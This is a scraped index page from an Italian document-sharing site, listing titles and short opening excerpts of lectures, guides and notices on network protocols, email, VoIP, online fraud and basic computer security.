Sicurezza informatica: Nozioni di base Come proteggere il proprio computer Suggerimenti e linee guida Carlo Carlesi Istituto di Scienza e Tecnologie dell'informazione A. Faedo 1 Sicurezza informatica: Nozioni di base Come proteggere il proprio computer Suggerimenti e linee guida Le minacce della rete 2

Dettagli

Posta elettronica e PEC

Posta elettronica e PEC Posta elettronica e PEC Lezione n. 12 Consulenti del Lavoro Client/Server Lo strato applicativo utilizza quasi sempre un architettura client/server Per ogni servizio o applicazione vi è attualmente un

Dettagli

INFORMATIVA CLIENTELA CartaBcc

INFORMATIVA CLIENTELA CartaBcc INFORMATIVA CLIENTELA CartaBcc L utilizzo di internet quale veicolo per l accesso ad informazioni od esecuzione di operazioni finanziarie presuppone una seppur minimale conoscenza dei rischi connessi all

Dettagli

Livello Applicazione. Davide Quaglia. Motivazione

Livello Applicazione. Davide Quaglia. Motivazione Livello Applicazione Davide Quaglia 1 Motivazione Nell'architettura ibrida TCP/IP sopra il livello trasporto esiste un unico livello che si occupa di: Gestire il concetto di sessione di lavoro Autenticazione

Dettagli

1. Il furto di identità digitale

1. Il furto di identità digitale 1. Il furto di identità digitale La diffusione crescente dei servizi disponibili in rete costituisce un fatto di rilevanza assoluta, con il quale un numero sempre maggiore di diverse realtà aziendali è

Dettagli

Navigazione Consapevole. Conoscere il lato oscuro di Internet

Navigazione Consapevole. Conoscere il lato oscuro di Internet Navigazione Consapevole Conoscere il lato oscuro di Internet Intro Browsing e ricerche Privacy e sicurezza (password sicure / chiavi elettroniche) Usare la posta elettronica Difendersi dalle minacce online

Dettagli

VoIP e. via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE

VoIP e. via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE VoIP e via SOLUZIONI E INNOVAZIONE PER LA COMUNICAZIONE VoIP è Voice over IP (Voce tramite protocollo Internet), acronimo VoIP, è una tecnologia che rende possibile effettuare una conversazione telefonica

Dettagli

Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto

Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto CYBER RISK: RISCHI E TUTELA PER LE IMPRESE Confindustria Vicenza 26/02/2015 Polizia di Stato Compartimento Polizia Postale e delle Comunicazioni Veneto Suddivisione territoriale Compartimenti e Sezioni

Dettagli

Protezione della posta elettronica mediante crittografia

Protezione della posta elettronica mediante crittografia Consorzio per la formazione e la ricerca in Ingegneria dell'informazione Politecnico di Milano Protezione della posta elettronica mediante crittografia Davide Cerri CEFRIEL - Area e-service e Technologies

Dettagli

SMSPortal. SMS-Gateway interfaccia SMTP. Versione 1.0.0. 2004, 2005, 2006 SMSPortal. Digitel Mobile Srl Via Raffaello, 77 65124 Pescara (Italy)

SMSPortal. SMS-Gateway interfaccia SMTP. Versione 1.0.0. 2004, 2005, 2006 SMSPortal. Digitel Mobile Srl Via Raffaello, 77 65124 Pescara (Italy) SMS-Gateway interfaccia SMTP Versione 1.0.0 2004, 2005, 2006 SMSPortal 1 1 Introduzione 1.1 Sommario Solo gli utenti autorizzati hanno accesso al nostro SMS Gateway e possono trasmettere messaggi SMS attraverso

Dettagli

Reti di Calcolatori. Application

Reti di Calcolatori. Application Reti di Calcolatori Application Dove siamo? 2 Livello applicativo Applicazioni che utilizzano i servizi di rete Porte TCP o UDP host LAN 3 Applicazioni Programmi applicativi e servizi usati dagli utenti

Dettagli

LA SICUREZZA NELLE COMUNICAZIONI TELEMATICHE: UN OBIETTIVO DI QUALITÀ NECESSARIO

LA SICUREZZA NELLE COMUNICAZIONI TELEMATICHE: UN OBIETTIVO DI QUALITÀ NECESSARIO Sei Sigma & Qualità vol. IV n. 3 259 LA SICUREZZA NELLE COMUNICAZIONI TELEMATICHE: UN OBIETTIVO DI QUALITÀ NECESSARIO Vito Santarcangelo 1, Nancy Santarcangelo 2 1 Centro Studi S.r.l., Zona Industriale

Dettagli

I rischi e le misure per rendere sicure le reti VoIP. Stefano Sotgiu

I rischi e le misure per rendere sicure le reti VoIP. Stefano Sotgiu VIP(i VoIP (in)security I rischi e le misure per rendere sicure le reti VoIP Stefano Sotgiu Agenda Il VoIP e la rete telefonica tradizionale Il VoIP più in dettaglio (SIP) Le minacce nel VoIP Cosa e come

Dettagli

Session Management. Corrado Aaron Visaggio Sicurezza delle Reti e dei Sistemi Software A.A. 2012/2013. Session Management 1

Session Management. Corrado Aaron Visaggio Sicurezza delle Reti e dei Sistemi Software A.A. 2012/2013. Session Management 1 Session Management Corrado Aaron Visaggio Sicurezza delle Reti e dei Sistemi Software A.A. 2012/2013 Session Management 1 intro Il protocollo http è stateless Modello request-response: transazione indipendente

Dettagli

Worm Detection Using E-mail Data Mining

Worm Detection Using E-mail Data Mining Worm Detection Using E-mail Data Mining Davide Chiarella davide.chiarella@ieiit.cnr.it Consiglio Nazionale delle Ricerche Istituto di Elettronica e Ingegneria dell Informazione e delle Telecomunicazioni

Dettagli

Piccolo vocabolario del Modulo 7

Piccolo vocabolario del Modulo 7 Piccolo vocabolario del Modulo 7 Cosa è Internet? Internet è una grossa rete di calcolatori, ossia un insieme di cavi e altri dispositivi che collegano tra loro un numero enorme di elaboratori di vario

Dettagli

Reti di Comunicazione e Internet

Reti di Comunicazione e Internet Politecnico di Milano Dipartimento di Elettronica e Informazione Reti di Comunicazione e Internet Laboratorio 6. Wireshark e Protocolli Applicativi Agenda della lezione Wireshark Protocolli applicativi:

Dettagli

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica.

La Sicurezza delle Reti. La Sicurezza delle Reti. Il software delle reti. Sistemi e tecnologie per la multimedialità e telematica. Sistemi e tecnologie per la multimedialità e telematica Fabio Burroni Dipartimento di Ingegneria dell Informazione Università degli Studi di Siena burronif@unisi unisi.itit La Sicurezza delle Reti La presentazione

Dettagli

Posta elettronica, PEC e servizi di rete

Posta elettronica, PEC e servizi di rete Posta elettronica, PEC e servizi di rete Consulenti del Lavoro AA 2010/2011 Client/Server Lo strato applicativo utilizza quasi sempre un architettura client/server Per ogni servizio o applicazione vi è

Dettagli

Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web

Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web 1 Ruberia mobile Android è il sistema operativo per smartphone e tablet più popolare ed è il secondo più preferito dopo Windows dal punto di vista degli autori dei virus. I primi programmi malevoli per

Dettagli

IPBX Office IPBX Office

IPBX Office IPBX Office IPBX Office IPBX Office include, oltre a tutte le funzioni di un centralino tradizionale, funzionalità avanzate quali ad esempio: voice mail con caselle vocali illimitate e personalizzate, risponditore

Dettagli

Posta Elettronica e Web

Posta Elettronica e Web a.a. 2002/03 Posta Elettronica e Web Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/~auletta/ Università degli studi di Salerno Laurea e Diploma in Informatica 1 Posta Elettronica

Dettagli

Parte II: Reti di calcolatori Lezione 9

Parte II: Reti di calcolatori Lezione 9 Università di Roma Tor Vergata Corso di Laurea triennale in Informatica Sistemi operativi e reti A.A. 2014-15 Parte II: Reti di calcolatori Lezione 9 Giovedì 2-04-2015 1 Come per una pagina Web, anche

Dettagli

- Corso di computer -

- Corso di computer - - Corso di computer - @ Cantiere Sociale K100-Fuegos Laboratorio organizzato da T-hoster.com www.t-hoster.com info@t-hoster.com La posta elettronica La Posta Elettronica è un servizio internet grazie al

Dettagli

FRING GUIDA EUTELIAVOIP

FRING GUIDA EUTELIAVOIP FRING GUIDA EUTELIAVOIP Fring - Guida all installazione EuteliaVoip Rev1-0 pag.2 INDICE COSA E FRING?...3 COME SI INSTALLA FRING?...3 COME ESEGUIRE LA REGISTRAZIONE AL SITO EUTELIAVOIP...4 Come eseguire

Dettagli

PROTOCOLLI APPLICATIVI PER INTERNET

PROTOCOLLI APPLICATIVI PER INTERNET PROTOCOLLI APPLICATIVI PER INTERNET IC3N 2000 N. 5 La famiglia dei protocolli TCP/IP Applicazioni e-mail,ftp,ssh,www TCP UDP ICMP IP ARP RARP IEEE 802-Ethernet-X25-Aloha ecc. Collegamento fisico 6 1 Protocolli

Dettagli

Protocolli applicativi basati su TCP/IP

Protocolli applicativi basati su TCP/IP Protocolli applicativi basati su TCP/IP A.A. 2005/2006 Walter Cerroni Protocolli applicativi Sono i protocolli utilizzati dalle applicazioni per scambiarsi informazioni attraverso la rete Esempi: HTTP

Dettagli

Applicazioni Web 2014/15

Applicazioni Web 2014/15 Applicazioni Web 2014/15 Lezione 1 - Il protocollo HTTP Matteo Vaccari http://matteo.vaccari.name/ matteo.vaccari@uninsubria.it (cc) Alcuni diritti riservati.! Informazioni http://matteo.vaccari.name/aw

Dettagli

USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO

USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO USO DEGLI STRUMENTI DI PAGAMENTO ELETTRONICO LA POLIZIA POSTALE E DELLE COMUNICAZIONI La Polizia Postale e delle Comunicazioni si occupa della prevenzione e repressione di tutti i reati commessi per il

Dettagli

Realizzazione di una Infrastruttura di Sicurezza

Realizzazione di una Infrastruttura di Sicurezza Realizzazione di una Infrastruttura di Sicurezza Andrea Lanzi, Lorenzo Martignoni e Lorenzo Cavallaro Dipartimento di Informatica e Comunicazione Facoltà di Scienze MM.FF.NN. Università degli Studi di

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Applicazioni Web 2013/14

Applicazioni Web 2013/14 Applicazioni Web 2013/14 Lezione 1 - Il protocollo HTTP Matteo Vaccari http://matteo.vaccari.name/ matteo.vaccari@uninsubria.it (cc) Alcuni diritti riservati. 1 Informazioni http://matteo.vaccari.name/aw

Dettagli

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP

IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Parte II - Reti di Calcolatori Applicazioni di Rete Domain Name System (DNS) IL LIVELLO APPLICAZIONI DNS, SNMP e SMTP Simple Network Manag. Protocol (SNMP) Posta elettronica Multipurpose Internet Mail

Dettagli

www.avg.it Come navigare senza rischi

www.avg.it Come navigare senza rischi Come navigare senza rischi 01 02 03 04 05 06.Introduzione 01.Naviga in Sicurezza 02.Social Network 08.Cosa fare in caso di...? 22.Supporto AVG 25.Link e riferimenti 26 [02] 1.introduzione l obiettivo di

Dettagli

Allegato 1. Le tecniche di frode on-line

Allegato 1. Le tecniche di frode on-line Allegato 1 Le tecniche di frode on-line Versione : 1.0 13 aprile 2011 Per una migliore comprensione delle tematiche affrontate nella circolare, riportiamo in questo allegato un compendio dei termini essenziali

Dettagli

Il Protocollo HTTP e la programmazione di estensioni Web

Il Protocollo HTTP e la programmazione di estensioni Web Il Protocollo HTTP e la programmazione di estensioni Web 1 Il protocollo HTTP È il protocollo standard inizialmente ramite il quale i server Web rispondono alle richieste dei client (prevalentemente browser);

Dettagli

La gestione e la prevenzione delle frodi esterne

La gestione e la prevenzione delle frodi esterne La gestione e la prevenzione delle frodi esterne Gianluigi Molinari Responsabile Ufficio Prevenzione Frodi Direzione Centrale Organizzazione e Sicurezza Roma 28/29 maggio 2012 Il fenomeno delle frodi è

Dettagli

SECurity Online. lo scenario e le evoluzioni di sicurezza per servizi bancari

SECurity Online. lo scenario e le evoluzioni di sicurezza per servizi bancari SECurity Online lo scenario e le evoluzioni di sicurezza per servizi bancari Febbraio 2012 AGENDA Presentazione generale La Società Numeri chiave e clienti Linee guida trasversali La sicurezza in SEC Servizi

Dettagli

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia

Protagonisti di INNOVAZIONE un progetto industriale unico in Italia Claudio De Paoli IT Security Practice Manager Un approccio innovativo alla sicurezza degli accessi ai servizi di ebanking Roma, gennaio 2011 Cybercrime: Costante aumento di Incidenti e frodi Il mercato

Dettagli